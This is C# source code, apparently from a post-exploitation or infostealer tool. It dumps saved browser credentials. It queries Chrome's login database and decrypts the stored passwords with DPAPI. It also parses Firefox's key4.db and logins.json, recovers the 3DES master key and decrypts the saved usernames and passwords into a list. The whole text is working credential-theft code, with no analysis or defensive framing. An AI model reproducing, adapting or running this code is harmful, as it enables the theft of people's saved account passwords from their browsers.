private void ChromeDatabaseDecrypt(SQLiteConnection sqliteConnection)
{
SQLiteCommand sqliteCommand = sqliteConnection.CreateCommand();
sqliteCommand.CommandText = "SELECT action_url, username_value, password_value FROM logins";
SQLiteDataReader sqliteDataReader = sqliteCommand.ExecuteReader();
//Iterate over each returned row from the query
while (sqliteDataReader.Read())
{
//Store columns as variables
string formSubmitUrl = sqliteDataReader.GetString(0);
//Avoid Printing empty rows
if (string.IsNullOrEmpty(formSubmitUrl))
{
continue;
}
string username = sqliteDataReader.GetString(1);
byte[] password = (byte[])sqliteDataReader[2]; //Cast to byteArray for DPAPI decryption
try
{
//DPAPI Decrypt - Requires System.Security.dll and System.Security.Cryptography
byte[] decryptedBytes = ProtectedData.Unprotect(password, null, DataProtectionScope.CurrentUser);
string decryptedPasswordString = Encoding.ASCII.GetString(decryptedBytes);
BrowserLoginData loginData = new BrowserLoginData(formSubmitUrl, username, decryptedPasswordString, "Chrome");
ChromeLoginDataList.Add(loginData);
}
catch (Exception e)
{
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine($"[!] Error Decrypting Password: Exception {e}");
Console.ResetColor();
}
}
sqliteDataReader.Close();
sqliteConnection.Dispose();
}
public FirefoxDatabaseDecryptor(string profile, string password)
{
ProfileDir = profile;
Key4dbpath = ProfileDir + @"\key4.db";
MasterPassword = password;
//Check profile for key4 database before attempting decryption
if (File.Exists(Key4dbpath))
{
Console.ForegroundColor = ConsoleColor.Green;
Console.WriteLine($"[+] Found Firefox credential database at: \"{Key4dbpath}\"");
Console.ResetColor();
// If Firefox version >= 75.0, asn.1 parser will throw IndexOutOfRange exception when trying to parse encrypted data as asn.1 DER encoded
try
{
Key4DatabaseConnection(Key4dbpath);
}
catch (IndexOutOfRangeException e)
{
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine($"[-] Could not correctly parse the contents of {Key4dbpath} - possibly incorrect Firefox version.");
Console.ResetColor();
}
//Store a RootObject from FirefoxLoginsJSON (hopefully) containing multiple FirefoxLoginsJSON.Login instances
FirefoxLoginsJSON.Rootobject JSONLogins = GetJSONLogins(ProfileDir);
//Decrypt password-check value to ensure correct decryption
DecryptedPasswordCheck = Decrypt3DES(GlobalSalt, EntrySaltPasswordCheck, CipherTextPasswordCheck, MasterPassword);
if (PasswordCheck(DecryptedPasswordCheck))
{
//Decrypt master key (this becomes padded EDE key for username / password decryption)
//Master key should have 8 bytes of PKCS#7 Padding
Decrypted3DESKey = Decrypt3DES(GlobalSalt, EntrySalt3DESKey, CipherText3DESKey, MasterPassword);
//Check for PKCS#7 padding and remove if it exists
Decrypted3DESKey = Unpad(Decrypted3DESKey);
FirefoxLoginDataList = new List <BrowserLoginData>();
Console.ForegroundColor = ConsoleColor.Yellow;
foreach (FirefoxLoginsJSON.Login login in JSONLogins.Logins)
{
try
{
if (!(login.FormSubmitURL.Equals(null)))
{
byte[] usernameBytes = Convert.FromBase64String(login.EncryptedUsername);
byte[] passwordBytes = Convert.FromBase64String(login.EncryptedPassword);
ASN1 usernameASN1 = new ASN1(usernameBytes);
byte[] usernameIV = usernameASN1.RootSequence.Sequences[0].Sequences[0].OctetStrings[0];
byte[] usernameEncrypted = usernameASN1.RootSequence.Sequences[0].Sequences[0].OctetStrings[1];
//Extract password ciphertext from logins.json
ASN1 passwordASN1 = new ASN1(passwordBytes);
byte[] passwordIV = passwordASN1.RootSequence.Sequences[0].Sequences[0].OctetStrings[0];
byte[] passwordEncrypted = passwordASN1.RootSequence.Sequences[0].Sequences[0].OctetStrings[1];
string decryptedUsername = Encoding.UTF8.GetString(Unpad(Decrypt3DESLogins(usernameEncrypted, usernameIV, Decrypted3DESKey)));
string decryptedPassword = Encoding.UTF8.GetString(Unpad(Decrypt3DESLogins(passwordEncrypted, passwordIV, Decrypted3DESKey)));
BrowserLoginData loginData = new BrowserLoginData(login.FormSubmitURL, decryptedUsername, decryptedPassword, "Firefox");
FirefoxLoginDataList.Add(loginData);
}
}
catch (NullReferenceException)
{
}
}
Console.ResetColor();
}
}
else
{
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine($"[-] No credential database found for Firefox profile: {ProfileDir}");
Console.ResetColor();
}
}
